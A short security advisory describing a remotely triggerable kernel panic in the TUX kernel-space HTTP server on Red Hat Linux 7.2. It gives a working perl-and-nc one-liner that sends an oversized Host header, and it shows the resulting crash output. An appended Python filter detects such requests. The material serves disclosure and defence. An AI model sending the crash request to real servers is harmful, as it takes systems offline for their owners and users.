Tux is a kernel-space HTTP server coded for optimal performance (IRQ affinity, HTTP compression, direct scatter-gather DMA etc.) and is meant to be used as the main HTTP server for static objects, with requests for dynamic content being passed to a user-space HTTPD server such as Apache on the same box when necessary. A security vulnerability in the product allows crashing the server by sending it a large Host parameter inside a valid HTTP GET request.
Credit:
The information has been provided by Aiden ORawe.
Vulnerable systems:
RedHat Linux 7.2:
 * Kernel(s) 2.4.7-10 and 2.4.9-7
 * TUX-2.1.0-2
The TUX web server is disabled by default.
It is possible to cause a denial of service condition by submitting a request with an oversized "Host:" header to the Tux daemon, causing an assertion failure and an eventual kernel panic. A total system reboot is required to return the box to full functionality. For example, the following script:
perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc 80
Will cause the affected box to crash with the below output (edited for brevity):
Code: Bad EIP Value.
(0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!
Despite being able to affect the contents of the EIP register, it seems this vulnerability cannot be utilized to provide for a remote root compromise.
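A defensive check for the condition described above, as an added example that is not part of the original advisory: it inspects a raw request head and flags an oversized or malformed Host header before the request is passed on, for use in a front-end filter or over captured traffic. The size limits and the function name are assumptions chosen for illustration, not values taken from TUX.

```python
import re

# Assumed policy limits (not from the advisory): a DNS name is at most 253
# characters, so a Host value far beyond that is never legitimate.
MAX_HOST_LEN = 255 + 6      # host name plus ":port"
MAX_HEADER_LINE = 4096      # generic cap for any single header line

# host[:port] or [IPv6 literal][:port]
HOST_RE = re.compile(rb"([A-Za-z0-9.\-]+|\[[0-9A-Fa-f:.]+\])(:\d{1,5})?")

def inspect_request_head(raw: bytes) -> list:
    """Return a list of findings for one raw HTTP request head."""
    findings = []
    # Accept CRLF and bare LF: the request in the advisory uses "\n" only
    # and has no terminating blank line, so do not rely on either.
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = re.split(rb"\r?\n", head)
    for line in lines[1:]:              # skip the request line
        if not line:
            continue
        if len(line) > MAX_HEADER_LINE:
            findings.append(f"header line of {len(line)} bytes exceeds {MAX_HEADER_LINE}")
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("header line without a colon")
            continue
        if name.strip().lower() == b"host":
            value = value.strip()
            if len(value) > MAX_HOST_LEN:
                findings.append(f"Host value of {len(value)} bytes exceeds {MAX_HOST_LEN}")
            elif not HOST_RE.fullmatch(value):
                findings.append("Host value is not a valid host[:port]")
    return findings

# Constructed sample inputs (not captured traffic).
NORMAL = b"GET / HTTP/1.0\r\nAccept: */*\r\nHost: www.example.com\r\n\r\n"
OVERSIZED = b"GET / HTTP/1.0\nAccept: */*\nHost: " + b"A" * 6000 + b"\n"

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("oversized", OVERSIZED)):
        print(label, inspect_request_head(req) or "ok")
```

A request that produces any finding should be rejected or logged at the front end rather than forwarded to the kernel-space server.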